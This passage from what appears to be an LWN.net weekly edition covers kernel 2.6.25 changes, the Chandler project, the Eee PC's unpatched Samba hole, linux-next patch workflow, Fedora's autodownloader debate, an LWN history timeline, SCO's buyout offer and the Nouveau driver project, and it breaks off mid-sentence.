 Disk I/O statistics (as seen in /proc/diskstats and under
     /sys/block) have been augmented with more information about
     request merging and I/O wait time.

 The S390 architecture now implements dynamic page tables - processes
     will use 2-, 3-, or 4-level page tables depending on the size of their
     address space.

 The ext4 "in development" flag has been added; mounting an ext4
     filesystem will now require an explicit "I know this might explode"
     option. 


Changes visible to kernel developers include:


 Many nopage() methods have been replaced by the newer 
     fault() API; the near-term plan is to remove
     nopage() altogether.  See this article for a
     description of the new way of "page not present" handling.

 This cycle has also seen a bit of a reinvigoration of the long-stalled
     project to eliminate the big kernel lock.  A number of BKL-removal
     patches have been merged, with more certainly to come.

 A generic resource counter mechanism was merged as part of the memory
     controller patch set; see &lt;linux/res_counter.h&gt; for the
     details. 

 reserve_bootmem() has a new flags parameter.  Most
     callers will set it to BOOTMEM_DEFAULT; the kdump code,
     though, uses BOOTMEM_EXCLUSIVE to ensure that it is the only
     one to touch the memory.

 Most architectures now have support for cmpxchg64() and
     cmpxchg_local(). 

 There is a new set of string functions:


     These functions convert the given strings to various forms of
     long values, but they will return an error status if the
     given string value, as a whole, does not represent a proper
     integer value.  These functions are now used in the parsing of kernel
     parameters. 


At this point, the merging of features is done (though there has been a bit
of pushing for one or two things to slip in) and the stabilization period
begins.  With luck, that process will go a little more quickly than it did
with 2.6.24.

		The Chandler Project moves forward


The Chandler Project
is a small-group collaboration application that is being produced
by the non-profit

Open Source Applications Foundation (OSAF).
OSAF was founded by Mitchell Kapor.  The foundation's
History
document reveals some background information.
The project has been under development for a number of years.
Version 0.1 of Chandler was
announced
in April, 2003.


From the Chandler
FAQ
entry on What is Chandler?


Chandler Project is an open source, standards-based personal information manager (PIM) built around small group collaboration and a core set of information management workflows modelled on Inbox usage patterns and David Allen's GTD (Getting Things Done) methodology.
See
Vision
for a more in-depth answer to this question.


Chandler provides an all-inclusive view of personal information,
it can operate on notes, email, tasks, appointments, events,
contacts, documents and additional personal resources.
The Chandler Desktop application provides a single user interface
with the ability to enter, view, search, group and share all
of the supported types of information.
The software is cross-platform, it currently runs on the Linux, Windows
and Macintosh platforms.
The Chandler software is being distributed under version 2.0 of the
Apache Software License.


The Chandler
features
document explains how the project is arranged:


Chandler consists of a cross-platform (Windows, Mac OS X and Linux) Chandler Desktop application and
Chandler Hub,
a sharing service and web application. Chandler is open source and standards-based.


The

FeatureList document covers the Chandler capabilities in
more detail, some screenshots are included.
OSAF provides free access to the Chandler Hub, information there is
available to any user with an account and a web browser.
The Chandler Server provides a central store for locally
managed information.
There are some

demo movies that show Chandler in action, some of the basic
Chandler concepts and terms are explained:


Item Chandler has four kinds of items: Note, Message, Task and Event. Chandler items can be of multiple kinds, e.g. Scheduled Tasks and Invitations.
Collection Chandler's primary mechanism for grouping items. Collections can contain items of any kind.
Application Area Chandler has four application areas: Mail, Tasks, Calendar and an all-inclusive All area. Chandler's application areas are a way to filter down your collections by item kind.
Triage Status An attribute on every item that is Chandler's principle mechanism for helping you manage what you're working on. The three triage statuses are NOW, LATER and DONE.
Tickler Alarm A custom alarm you can set on any item to automatically triage that item to NOW at a time you specify.


Two new releases were recently announced,
Chandler Desktop 0.7.4
and
Chandler Server 0.12.0.
The new Chandler Desktop change summary says:
"The 0.7.4 release adds a Tip of the day feature and a German  
translation contributed by a user. The triage status behavior was  
improved to be more useful. There have been dozens of bug fixes across  
the application, as well as fixes to the build and testing  
infrastructures."  The new Chandler Server change summary says:
"This release supports a standalone WAR form of Cosmo ready to
drop in   to an existing Tomcat installation.  A security issue
allowing   unauthorized access when a collection had been shared was
fixed.  A   number of smaller bugs have also been fixed for
Unicode usernames,  error logging, and the calendar web UI."


Chandler is in an active phase of development.  The software has evolved
from an interesting concept to a functioning system in recent years.
Organizations and individuals who have a need for some advanced
management and communications capabilities should be able to
find some benefits from using Chandler.


		Eee PC security or lack thereof


The Eee PC has garnered a lot of press
for its small form factor, low weight, and solid-state disk, but it has
also made a poor showing with security researchers.  RISE Security released
a report on the security of
the Eee last week, showing that it can be subverted ("rooted") right out of
the box from ASUS.  Unfortunately, it is even worse than that as, even after
updating an Eee using the standard mechanism, the hole is not patched. 


The vulnerability identified by RISE is in the Samba daemon (smbd), version
3.0.24, which is installed and runs on stock Eee PCs.  The vulnerability, CVE-2007-2446
was identified and patched last May, so the Eee is shipping with a version
of Samba known to be vulnerable to an arbitrary code execution flaw for
nine months or so.  In itself, that is not completely surprising.


When hardware vendors install a distribution—or commercial OS like
Windows—they tend to install the latest released version, which is likely to be out of date with respect to security
issues.  A vendor installing Fedora 8 or Debian etch today will be behind
on countless security updates.  But, unlike the Samba problem discovered on
the Eee, updates do exist in the standard places.  If the new user updates
their system immediately, there is a fairly small window of vulnerability.


Unfortunately for Eee owners, the modified Xandros distribution that comes
with it does not yet have an update for Samba.  This leaves all Eee PCs
vulnerable to being rooted by anyone on the same network.  Since the Eee is
meant as a mobile device, it likely spends a lot of its time connected to
various public networks, especially wireless networks.  The Eee makes an
interesting target for attackers because it very well might have
authentication information for banks or brokerages as well as other private
or confidential files.


Some have seriously
downplayed the threat but it is clear they don't understand it:

The root attack performed was relatively easy to do, if you like command
lines.  Maybe Asus or Xandros could work on a patch for this.  It almost
makes one wonder how many other exploits are lying under the surface just
waiting to be found.  But, it's not like this actually puts you in danger,
just how many hackers are going to be looking for the Asus EeePC or even
Xandros based system online and attack them?  Probably not many. 


Sales of the Eee last year was around 300,000 units; large
enough to be an attractive target for the malicious.  Because there is not an
update to close the hole, Eee users have to rely on other means to protect
themselves.  This eeeuser.com
comment thread provides some of the better advice for dealing with the
problem.  Removing the Samba package seems to be the simplest, but fairly
heavy handed, way to avoid the hole—but many folks need a working
Samba.  There is no way to disable Samba from the Eee GUI which is the way
most owners plan to interact with the machine.  This whole incident makes
it seem like ASUS (and perhaps Xandros) are not terribly interested in the
security of the machines that they sell.


There is a larger issue here.  When the normal means of getting security
patches comes from the same medium that is also the biggest security
threat, there will always be windows of vulnerability.  Even if hardware vendors
diligently update the distribution they install, there is still some
shelf-life and shipping time where security updates can be
released.  Various studies have shown that
there may not be enough time to download patches before an unpatched
system succumbs to an attack.  


It is a difficult problem to solve completely. Any solution must be very
straightforward and consistent so that unsophisticated users can be trained
to do it as a matter of course.  News about security issues needs to get
more widespread attention as well, so that those same users know
when the procedure needs to be followed.  Firewalls and other
network protections only go so far if the machine needs to reach out to the
internet to pick up its updates.

 If distributions provided some kind of blob (tar file, .deb, .rpm,
etc.) that contained all of the security updates since the release, users
could grab that from a different (presumably patched or not vulnerable)
machine, put it on a USB stick or some other removable media and get it to
the new machine.  A utility provided by the distribution could then process
that blob to apply all the relevant patches—all while the vulnerable
machine stayed off the net.  As the world domination plan continues,
threats against Linux will become more commonplace; we need to try and
ensure that users, especially the unsophisticated ones, can be secure in
their choice of Linux.  

		linux-next and patch management process


The kernel development process operates at a furious pace, merging
on the order of 10,000 changesets over the course of a 2-3 month
release cycle.  There have been many changes over the last few years which
have helped to make this level of patch flow possible, and the process has
been optimized significantly.  An ongoing discussion on the kernel mailing
list has made it clear, though, that a truly optimal solution has not yet
been found.


It started with the announcement
of the linux-next tree.  This tree, to be maintained by Stephen
Rothwell, is intended to be a gathering point for the patches which are
planned to be merged in the next development cycle.  So, since we are
currently in the 2.6.25 cycle, linux-next will accumulate patches for
2.6.26.  The idea is to solve the patch integration issues there and reduce
the demands on Andrew Morton's time.


The question which was immediately raised was this: how do we deal with big
API changes which require changes in multiple subsystems?  These changes
are already problematic, often requiring maintainers to rework their trees
in the middle of the merge window.  Trying to integrate such changes
earlier, in a separate tree, could bring a new set of problems.  There will
be a lot of conflicts between patches done before and after the API change,
and somebody is going to have to put the pieces back together again.
Andrew does some of that now, but the problem is big enough that not even
Andrew can solve it all the time.  The bidirectional SCSI patches merged
for 2.6.25 were held up as an example; that
change required coordinated SCSI and block layer patches, and it never was
possible to get the whole thing working in -mm.


Arjan van de Ven asserted that the only way
to make large API changes work is to merge them first, at the beginning of
the merge window.  The merged patch would fix all in-tree users of the
changed API, as is
the usual rule.  Maintainers of all other trees could then merge with the
updated mainline, fixing any new code which might be affected by the API
change.  This is, essentially, the approach which was taken for the big
device model changes in 2.6.25; they hit the mainline at the beginning of
the merge window, then everybody else got to adapt to the new way of doing
things.


Greg Kroah-Hartman worries that this approach
is not sufficient, especially when live trees are being merged.  If an
API change in one tree forces a change to a separate tree, the coordination
issues just get hard.  Keeping the secondary changes in the primary tree
risks conflicts with patches in the proper subsystem tree.  Patches which
reach across trees are also, increasingly, being discouraged as making life
harder for everybody.  But the fixup patch will not apply to its nominal subsystem
tree as long as the API change itself is not there.  In the -mm tree, this
sort of problem is glued together by a series of fixup patches maintained
by Andrew; Greg says that the linux-next tree would need something similar.


David Miller's suggestion was to resolve
this sort of conflict through frequent rebasing of the -next tree.
Rebasing is an operation (supported by git and other code management tools)
which takes a set of patches against one tree and does what's required to
make them apply to a different version of the tree.  It can be quite useful
for maintaining patches against a moving target - which kernel trees tend
to be.  David talked about how he rebases his (networking subsystem) trees
frequently as a way of eliminating conflicts with the mainline and, in the
process, cleaning some cruft out of the development history.


It turns out, though, that this frequent rebasing is not popular with the
developers who are downstream of David.  Rebasing the tree forces all
downstream contributors to do the same thing, and to deal with any merge
conflicts that result.  It makes it much harder to prepare trees which can
be pulled upstream and creates extra work.


This was where Linus jumped into the
conversation and expressed his dislike of rebasing.  He echoed the
complaints from downstream developers that a constantly-rebased tree is
hard to prepare patches against.  It also confuses the development history,
making changes to other developers' patches in silent ways.  After
somebody's patch set has been rebased, it is no longer the patches that
were sent.  So, says Linus:


	So there's a real reason why we strive to *not* rewrite
	history. Rewriting history silently turns tested code into totally
	untested code, with absolutely no indication left to say that it
	now is untested.


It is about here that Andrew Morton commented that git does not appear to be
matching entirely well with the way that kernel developers work.  Some of
the solution may be found in tools more oriented toward the management of
patch queues - such as quilt.  There may be a renewed push to get more
quilt-like functionality built into git (along the lines of the stacked git project) in the near
future.


Linus is also not entirely pleased with how
the integration of patches only happens in the mainline:


	I'm also a bit unhappy about the fact you think all merging has to
   	go through my tree and has to be visible during the two-week merge
   	period. Quite frankly, I think that you guys could - and should -
   	just try to sort API changes out more actively against each other,
   	and if you can't, then that's a problem too.


His suggestion is that a separate git tree should be created to contain a
large API change - and nothing else.  Affected subsystem maintainers could
then merge that tree and develop against the result.  In the end, all of
the pieces should merge nicely in the mainline.

This approach raises a number of interesting issues.  The API-change tree
has to be agreed upon by everybody, and it must be quite stable - lots of
changes at that level will create downstream trouble.  There must also be a
high degree of confidence that this API-change tree will, in fact, get
merged into the mainline; should Linus balk, everybody else's trees will no
longer be applicable to the mainline.  Replacing the current "tree of
trees" patch flow with something messier could create a number of
coordination issues.  And there are fears that a mainline tree built from
this process would fail to build in many of its intermediate states, which
would make tools like "git bisect" much harder to use.  Even so, it could
be part of the long-term solution.


Linus also took the opportunity to complain about large-scale API changes
in general:


	Really. I do agree that we need to fix up bad designs, but I
   	disagree violently with the notion that this should be seen as some
   	ongoing thing. The API churn should absolutely *not* be seen as a
   	constant pain, and if it is (and it clearly is) then I think the
   	people involved should start off not by asking "how can we
   	synchronize", but looking a bit deeper and saying "what are we
   	doing wrong?"


He also stated that the costs of big API
changes are high enough that we should, more often, stay with older
interfaces, even if they are not as good as they could be.  Others disagreed, claiming that Linux must continue
to evolve if it is to stay alive and relevant.  


The rate of change seems unlikely to fall in the near future.  There may be
some changes to how big changes are done, though.  As suggested by Ted Ts'o, more changes could be
done by creating entirely new interfaces rather than breaking old ones.
With Ted's scheme, the old interface would be marked "deprecated" at the
beginning of the merge window.  Developers would then have the entire
development cycle to adjust to the change, and the deprecated interface
would be removed before the final release.


There is resistance to this approach, based on the observation that getting
rid of deprecated interfaces tends to be harder than one would expect.
But, still, it is a relatively painless way of making changes.  The current
transition (in the memory management area) from the nopage() VMA
operation to fault() is an example of how it can work.  Nick
Piggin has been slowly changing in-tree users with the eventual goal of
removing nopage() altogether.  For now, though, both interfaces
coexist in the tree and nothing has been broken.


Like the kernel itself, its development process is undergoing constant
change and (hopefully) improvement.  As the development community and the
rate of change continues to grow, the process will have to adjust
accordingly.  What changes come out of this discussion remain to be seen.
But it's worth noting that Andrew Morton fears that the biggest problem - regressions
and bugs - will be relatively unaffected.

		Autodownloading considered harmful


A Fedora user recently asked: might it be
possible for the project to put together a package which would
automatically download and install the (proprietary) Google Earth
application?  Debian has googleearth-package,
which makes an installable package from the downloaded application, but
there is no such convenience for Fedora users.  The quick answer appeared
to be "no" - Fedora is for free software only, and packaging tools for
proprietary programs do not fit the bill.


It did not take long for others to point out the "autodownloader" facility
shipped with the Fedora games spin now.  This tool is needed to make
certain games work where the game is free software, but it needs
proprietary data to provide the full experience.  Games like Quake3 and
Rise of the Triad fit this description.  With autodownloader, these games
can be shipped with Fedora and the proprietary data will be fetched
automatically on the destination machine.  This scenario does not seem all
that different than downloading a proprietary application like Google Earth
and installing it.


The difference, as seen by the Fedora camp, is that autodownloader can only
obtain data, not code.  The fact that much of that data may, in
fact, be code which is fed to a virtual machine within the game is sort of
glossed over.  In the discussion, it was also suggested that games
requiring autodownloader should come with enough free data to be minimally
usable, though that does not seem to have been enforced with great vigor.
Alan Cox's suggestion that the real test
should be "is it possible to create free data for this game?" makes some
sense, but that is not the operative rule now.


Such a discussion cannot go on long, though, before somebody brings up the
real sore point: CodecBuddy.  This time, it was Hans de Goede who raised the issue:


	Not only does it automatically download some gratis closed source
	code, it even offers the user to buy closed source code,
	effectively free advertising for commercial closed source!


According to Hans, there is no point in discussing autodownloader as long
as CodecBuddy remains in the repository.

Outgoing Fedora leader Max Spevack is trying to organize a discussion aimed
at reaching some sort of clarity on these issues.  Christopher Blizzard had
an interesting idea: hand more of the
decisions about (and responsibility for) the shipping of problematic code
to the upstream projects.  The Miro
project was held up as an example.  Christopher's proposal has some echoes
of the disintermediation of
distributions discussion which was covered here last week.  When it
comes to patent-encumbered codecs, distributions like Fedora would happily
accept disintermediation.

In the absence of a real solution to the patent problem, some sort of
disintermediation may be the only workable answer for distributions like
Fedora.  They may not be willing to ship the code, but others are.  So it's
mostly just a matter of making the connection between those repositories
and the users as straightforward and painless as possible.  Spending time
with search engines to find useful programs or data may build character,
but it does not help create a useful or pleasurable Linux user experience.

		Ten-year timeline part 6: almost to the present


Part 5 of this increasingly
long series stopped in March, 2004, when BitMover loudly proclaimed that
the use of BitKeeper had doubled the pace of kernel development.  This
installment picks up from there, looking at a year when BitKeeper remained
in the news, the SCO case was in progress, software patents became more
threatening, and more.


 April 8, 2004: The first
     X.org release.  SELinux shows up in a Fedora Core 2 test
     release.  Red Hat v. SCO is put on indefinite hold (where it remains
     to this day).  Anti-software-patent demonstrations are held in
     Europe. 


This week featured some important news.  The launch of X.org signaled the
resurrection of Linux desktop work and the beginning of a much more
interesting and promising era.  Meanwhile, Fedora took the lead in pushing
SELinux-based mandatory access control technology into a general-purpose
system.  That work is still very much in progress nearly four years later,
but, like it or not, SELinux has become an important part of our defensive
arsenal.


 April 15, 2004: The 2.6.6
     kernel gains POSIX message queues, filesystem speedups, internal API
     changes, laptop mode, 4K stacks, auditing, the CFQ I/O scheduler,
     and more.  Sun and Microsoft
     make a $2 billion deal.  Lindows becomes Linspire.

 April 22, 2004: Linspire
     files to go public.  BayStar tells SCO it wants its money back.

 April 29, 2004: Gentoo
     founder Daniel Robbins leaves the project.


Something else which was going on during this time was a rising level of
discontent over the management of the Fedora project, which was not turning
out to be the open community that many had hoped for.  Pause for a moment
and revisit this classic
dialog posted by Konstantin Ryabitsev, which so clearly documented how
the situation was seen by the community at that time.  Fedora has come a
long way since then.


 May 20, 2004: The
     European Council approves the software patent directive, sending it
     back to the Parliament for final passage.  


Remember: the directive approved by the Council was the original
version which legitimized software patents, not the version amended by the
Parliament which did not.  Thus started the final (so far) round in the
fight against European software patents - a round which we eventually won.


 May 27, 2004: The kernel
     adopts the Signed-off-by: convention.  The 2.6.7 kernel gains
     scheduling domains, the object-based reverse mapping VM, filtered
     wakeups, and more.


The thing to remember here is that 2.6 was alleged to be a stable kernel
series, and everybody was still waiting for 2.7 to start.  Linus defended
the massive VM changes with the claim that they were, in fact, an
"implementation detail."  The realization that the kernel development
process had, in fact, already changed did not come through until...


 July 22, 2004: The "new"
     kernel development process is adopted.


This kernel summit decision - which, among other things, said that there
would be no 2.7 kernel - surprised almost everybody.  Certainly there have
been some issues since then, but nobody really wants to go back to the old,
pre-2.6 days.


 August 5, 2004: Open
     Source Risk Management funds a study showing that the kernel infringes
     on 283 patents, offers patent suit insurance.  SCO Forum is held,
     featuring a keynote by Rob Enderle; the rest of the world looks on
     incredulously.  The Munich Linux deployment is put on hold as a result
     of software patent fears.

 August 19, 2004: Lindows
     gives up on its IPO.  The 2.6.8.1 kernel is released.


There were interesting cross-currents happening at this time.  On the one
hand, companies like Open Source Risk Management were trying to use SCO as
a way to scare companies (and individual developers) into buying its
insurance offerings.  On the other, there was a hallucinogenic aspect to
the SCO Forum discussions that escaped nobody; SCO's time of being taken
seriously by the wider world was already done.  

It's worth noting that OSRM still exists, but its insurance offering now
is for companies worried about GPL-infringement suits.

Meanwhile, 2.6.8.1 was the first three-dot kernel release ever; it was
rushed out in response to an unpleasant, last-minute bug in 2.6.8.


 August 26, 2004: IBM
     brings GPL-infringement charges against SCO.  LWN fails to reproduce
     the posted reiser4 filesystem benchmarks, gets in trouble with
     Namesys. 

 September 16, 2004: Sun
     announces plans to open-source Solaris.  OSDL and the Free Standards
     Group announce a plan for cooperation on the Linux Standard Base.


OSDL and the FSG were, at this point, separate groups which, at times,
almost seemed to be in competition with each other.  Those days, of course,
are no more: the two have since merged and become the Linux Foundation.


 September 23, 2004: the
     Ubuntu distribution announces its existence.


Who would have thought that one could create a major new distribution in
2004?  One might well wonder whether the situation is any less open now.


 October 7, 2004: the
     bnetd developers lose their DMCA case.  Concerns about kernel quality
     are expressed.  Microsoft's FAT patent is overturned.

 October 14, 2004: Novell
     says it will use its patents "as appropriate" to defend free software
     projects against patent attacks.  Jeff Merkey offers $50,000 for the
     right to take the kernel proprietary.  The realtime preemption patch
     set gets started.

 October 21, 2004: the
     first Ubuntu release (4.10) comes out.  Busybox 1.0 is released at
     last.  Mozilla begins fund raising to advertise Firefox in the New
     York Times.

 November 11, 2004:
     Firefox 1.0 is released.  Novell gets $500 million in anti-trust cash
     from Microsoft.


The Firefox 1.0 release was, in a very real sense, the much-delayed
culmination of the process which began back in 1998, when Netscape
announced that it would be releasing its code.  Firefox was almost seven
years in the making, but, sometimes, late really is better than never.
Even those of us who use a different browser should be thankful for the
effect Firefox has had toward the creation of a standard-compliant web and
a competitive environment for web browsers.


 November 18, 2004: the
     Linux Core Consortium is formed by Conectiva, MandrakeSoft, Progeny,
     and Turbolinux.

 December 2, 2004:
     MandrakeSoft turns a profit.


Whether it's called United Linux, the Linux Core Consortium, or Manbo-Labs,
this is an idea which returns on occasion: pool effort on the creation of a
base distribution so that each player can concentrate their differentiation
efforts on the higher levels.  It often seems not to work, though.  It is
hard to compete with more community-based distributions through the
establishment of a base platform by corporate fiat.  It seems that the true
"base" distributions have names like Debian or Fedora.


 January 13, 2005: Debian
     runs afoul of the Mozilla trademark policy.  The European Parliament
     attempts to restart the software patent discussion from the
     beginning. 

 January 27, 2005: Sun
     starts releasing Solaris code under the CDDL.  

 February 3, 2005: The
     Software Freedom Law Center is founded.  Eben Moglen starts talking
     about GPLv3.  Russ Nelson becomes the president of the Open Source
     Initiative - briefly.

 February 10, 2005: IBM's
     requests for summary judgment in the SCO case are dismissed -
     temporarily - by Judge Kimball.  BitKeeper flame wars return, this
     time about the locking-up of history metadata and license-based
     prohibitions on its extraction.


The locking-up of metadata within BitKeeper was a sore point even for
developers who had accepted BitKeeper in general.  Larry McVoy was unsympathetic, though, stating
that he was operating within his rights.  This episode was the beginning of
the end for BitKeeper and the kernel.


 March 3, 2005:
     MandrakeSoft acquires Conectiva.  The European Commission ignores the
     European Parliament's request to restart the software patent directive
     process.

 March 10, 2005: Kernel
     quality concerns lead to the creation of the -stable tree.


Those quality concerns are not gone now, though they have diminished
somewhat.  The -stable tree seemed like an experiment at the time, but it
has proved successful and is still being produced almost three years
later. 


 April 7, 2005: The
     BitKeeper era comes to an abrupt end when the free-beer license for
     the software is terminated by BitMover.  (Unfounded) rumors about a
     merger between UserLinux and Ubuntu circulate.

 April 14, 2005: Linus
     posts the first version of git.  MandrakeSoft becomes Mandriva.


The termination of free-beer BitKeeper was probably inevitable from the
very beginning of its existence; trying to maintain a closed system with
proprietary data formats in the middle of a highly open process was always
a losing proposition.  For some time, many of us had feared that it could
end in a much uglier way than it actually played out.  We, the community,
had danced on some thin ice for a while, but, when it broke, the water was
only ankle-deep.  We got lucky.

As your editor has said before, BitKeeper did us a lot of good by bringing
order to the kernel development process when things had been working very
poorly, and by showing the world what distributed revision control could
do.  It set the stage for what came after.  Git was not the first free
distributed revision control system, but it was the first to be employed on
such a massive scale.  In a real sense, git launched a new era of free
software development.

On that note, this article will end - and, probably, the retrospective
series ends as well.  As events become more recent, the difficulty of putting
them into historical perspective gets greater.  A retrospective covering
the remaining 2+ years risks becoming a repeat of the annual timelines and
adding little of value.  That period is best left for the 20-year
retrospective.  

So, the entire LWN staff would like to say
"thanks!" one last time to our readers, who have treated us so well for the
last ten years.  It has been an incredible ride.

		SCO to continue the fight?


Just as it seemed the SCO saga was drawing to a close, a new player, with
up to $100 million to risk, has come on the scene.  Stephen Norris Capital
Partners (SNCP) has made an offer to take SCO private while providing a
line of credit to allow the company to continue its operations.
If the bankruptcy court
in Delaware agrees to the plan—which is not a foregone
conclusion—SCO and its various legal cases could be with us for a
long time to come.

 SNCP will put up $5 million in cash to essentially purchase between 51
and 85% of SCO; the exact percentage is dependent upon how much of the $95
million credit line is used to pay off Novell and/or IBM.  If there is no
payment, because SCO eventually wins those cases, SNCP will get 51%.  If
the payment is over $30 million, SNCP gets 85%; in between those two, the
percentage of ownership will be pro-rated between the two.  The actual
transaction would issue "Series A Preferred" stock to SNCP (and its
investors), which would be convertible into SCO "New Common Stock"; the
current common stockholders would be see their shares "extinguished" and a
trust established for them.  This deal would take SCO private, no longer
publicly traded nor subject to SEC reporting requirements.  

Under the proposed agreement, the credit line has an interest rate of the London Interbank Offered Rate
(LIBOR) plus "1700 basis points"—17% for those without a high-finance background—which currently works out to be around 20%.  This is
clearly not cheap money, but it does provide a rather large war chest for
SCO to continue the fight. The Memorandum of
Understanding (MOU) [PDF] makes it clear that interest payments are part of
what the line of credit is supposed to pay for:

   The purpose of the loan is to provide funds for (i) working capital for
   SCO following its emergence from bankruptcy, (ii) to pay interest when
   due under the Debt Financing, and (iii) to support the prosecution of
   the Reorganized Debtor's Litigation Claims, including providing letters
   of credit or other financial arrangements adequate to support any
   required appellate bonds (in which event the Reorganized SCO shall pay
   the reasonable letter of credit fees and expenses), and to effect
   payment of any final award against the Reorganized Debtor).


SCO's bombastic CEO, Darl McBride, will be required to resign as a
condition of the deal.  The Series A stockholders would be entitled to
elect four of the seven board members, ensuring that they control the
day-to-day direction of the company.  The CEO would hold another seat, as
would an "outside executive with suitable industry expertise."  The
remaining seat would be open to anyone and voted on by the current common
stockholders. 


What do the current stockholders get from this deal?  Not much in
the short term, as the MOU would set up a trust with $2 million (from the
$5 million cash investment) to be distributed amongst the current
stockholders.  The current common stock would be "extinguished" and the
trust would hold "New Common Stock" equivalent to the 15-49% left over
based on the amount of the credit line used.  Shareholders would get a
pro-rata interest in the trust based on their current percentage of
ownership.  Based on 22 million outstanding shares, the distribution will
amount to around $0.09 per share.


Since SCO sued IBM in March 2003, most of the stock speculation has been
based on some kind of monetary settlement from IBM.  Investors in SCO since
that time have essentially been betting on that outcome; the new arrangement
still allows the current stockholders to hold onto their litigation lottery
ticket.  Any settlement money that comes to SCO as a result of the Novell
and IBM cases would be paid to the trust in the percentage of ownership of
the company that it holds (i.e. 15-49%).  At that time, the trust would
also get its percentage of four times the previous year's earnings.  These
would then be distributed to the members of the trust.


It's a fairly complicated deal, this just covers the high points; the
curious are directed at the MOU itself.  It is a bit premature to proclaim
that SCO is going private or getting $100 million as some in the press
have done.  The bankruptcy court will have its say; Novell may have an objection
or two as well though, as things currently stand, they would be the likely
beneficiary of some substantial part of the line of credit.  We may get a
read on how confident Novell is based on what, if any, objections they raise.


It is hard to imagine that SNCP thinks SCO's business prospects are such
that a large financial commitment is warranted.  This is very clearly an
attempt to wring money out of the current litigation—and perhaps
start additional lawsuits.  It is interesting to note that in addition to
the Novell and IBM lawsuits, the MOU specifically mentions the Autozone
case.  There is speculation that the idea of a "Linux tax" on users is an
outcome that SNCP and its investors covet.


The question is, does SNCP truly believe that the claims made by
SCO—without much in the way of supporting evidence so far—are
likely to succeed on their merits?  Or do they think that by providing
enough incentive—in the form of a further protracted legal
battle—might cause someone to settle?  The IBM case has been dragging
on for almost five years now. With the kind of money SCO would have at its
disposal if this deal goes through, dragging out for another five does not seem implausible.  At some point IBM or Novell may tire of
the whole thing and try to cut some kind of deal.  One hopes not, but that
may be exactly what SNCP is betting on.  The other side of that coin is
that if that doesn't happen, we may well get a real hearing on some of
IBM's counterclaims, in particular the GPL-infringement claims.
That could 
be very interesting to watch. 


		The state of Nouveau, part I


[Editor's note: the following is the first in a two-part article on the
status of the Nouveau project.  This installment is an introductory piece
describing the problem; the second part (to appear in one week) looks at
how Nouveau development is being done and its current status.]


Nouveau is an effort to
create a complete open source driver for NVidia 
graphics cards for X.org.  It aims to support 2D and 3D acceleration from
the early NV04 cards up to the latest G80 Cards and work across all
supported architectures like x86-64, PPC and x86.
The project originated when Stéphane Marchesin set out to de-obfuscate parts
of the NVidia-maintained nv driver.  However, NVidia had corporate policies
in place about the nv driver, and had no plans to change them at the
time. So they refused Stéphane's patches.

This left Stéphane with the greatest open source choice:
"fork it"! At FOSDEM in February 2006, Stéphane unveiled his plans for an
open source driver for NVidia hardware called Nouveau. The name was
suggested by his IRC client's French autoreplace feature which suggested
the word "nouveau" when he typed "nv". People liked it, so the name
stuck. The FOSDEM presentation got the project enough publicity to engage
the curiosity of other developers.

Ben Skeggs was one of the first developers to sign up.  He had worked on reverse
engineering the R300 (one of ATI graphics chips) shader components and
writing parts of the R300 driver; as a result, he had great experience with graphics
drivers. He initially showed interest in the NV40 shaders only, but he got
caught in the event horizon and has worked on every aspect of the driver
for NV40 and later cards.

The project engaged other developers with short and long term interest. It
also generated a large amount of interest due to a pledge drive that an
independent user started.

However, the project was mainly developed on IRC and it was quite difficult
for newcomers to get any insight into previous development; reading
IRC logs is unpractical at best.  With this in mind, KoalaBR decided to
start summarizing development in a series of articles known as the TiNDC
(The irregular Nouveau Development Companion). This series of articles
proved very useful for attracting developers and testers to the
project. TiNDC issues are published every two to four weeks; as of this
writing, the current issue is TiNDC
#34. 

Linux.conf.au 2007 saw the first live demo of Nouveau. Dave Airlie had signed up to
give a talk on the subject; he managed to persuade Ben Skeggs that showing a
working glxgears demo would be a great finish to the talk. Ben toiled furiously
with the other developers to get the init code into shape for his laptop
card and the presentation was a great success.

After missing a Google Summer of Code place, X.org granted Nouveau a
Vacation of Code alternative. This saw Arthur Huillet join the team to
complete proper Xv support on Nouveau. Arthur saw the light and continued
with the project once the VoC ended.
In autumn 2007 Stuart Bennett and Maarten Maathuis vowed to get Nouveau's
RandR1.2 into a better shape.  Since then a steady stream of patches has
advanced the code greatly.

The project now has 8 regular contributors (Stéphane Marchesin, Ben Skeggs,
Patrice Mandin, Arthur Huillet, Pekka Paalanen, Maarten Maathuis, Peter
Winters, Jeremy Kolb, Stuart Bennett) with many more part time
contributors, testers, writers and translators.

NVidia card families

This article will use the NVidia GPU technical names as opposed to marketing names. 


Where there are "N" and "G" naming the "N" variant (NV4x, NV5x) will be used.
Further information can be found on the Nouveau site.

Graphic Stack Overview

Before jumping into the Nouveau driver, this section provides a short
background on the mess that is the Linux graphics stack.
This stack has a long history dating back to Unix X
servers and the XFree86 project.  This history has lead to a situation quite unlike
the driver situation for any other device on a Linux system. The graphics
drivers existed mainly in user space, provided by the XFree86 project, and
little or no kernel interaction was required. The user-space component known
as the DDX (Device-Dependant X) was responsible for initializing the card,
setting modes and providing acceleration for 2D operations.

The kernel also provided framebuffer drivers on certain systems to allow a
usable console before X started.  The interaction between these drivers
and the X.org drivers was very complex and often caused many problems
regarding which driver "owned" the hardware.

The DRI project was started to add support for direct rendering of 3D
applications on Linux. This meant that an application could talk to the 3D
hardware directly, bypassing the X server. OpenGL was the standard 3D API, but
it is a complex interface which is definitely too large to
implement in-kernel. GPUs also provided completely different low-level
interfaces. So, due to the complexity of the higher level interface and
nonstandard nature of the hardware APIs, a kernel component (DRM) and a
userspace driver (DRI) were required to securely expose the hardware interfaces
and provide the OpenGL API.

Shortcomings of the current architecture have been noted over the past few
years; the current belief is that GPU initialization, memory management,
and mode setting need to migrate to the kernel in order to provide better
support for features such as suspend/resume, proper cohabitation of X and
framebuffer driver, kernel error reporting, and future graphics card
technologies.

The GPU memory manager implemented by Tungsten Graphics is known as TTM.  It was originally designed as a
general VM memory manager but initially targeted at Intel hardware.
On top of this memory manager, a new modesetting architecture for the
kernel is being implemented.  This is based on the RandR 1.2 work found in
the X.org server.

GPU architecture

Graphics cards are programmed in numerous ways, but most initialization and
mode setting is done via memory-mapped IO. This is just a set of registers
accessible to the CPU via its standard memory address space. The registers
in this address space are split up into ranges dealing with various
features of the graphics card such as mode setup, output control, or clock
configuration.
A longer explanation can be found on Wikipedia.

Most recent GPUs also provide some sort of command processing ability where
tasks can be offloaded from the CPU to be executed on the GPU, reducing the
amount of CPU time required to execute graphical operations.  This
interface is commonly a FIFO implemented as a circular ring buffer into which
commands are pushed by the CPU for processing by the GPU.  It is
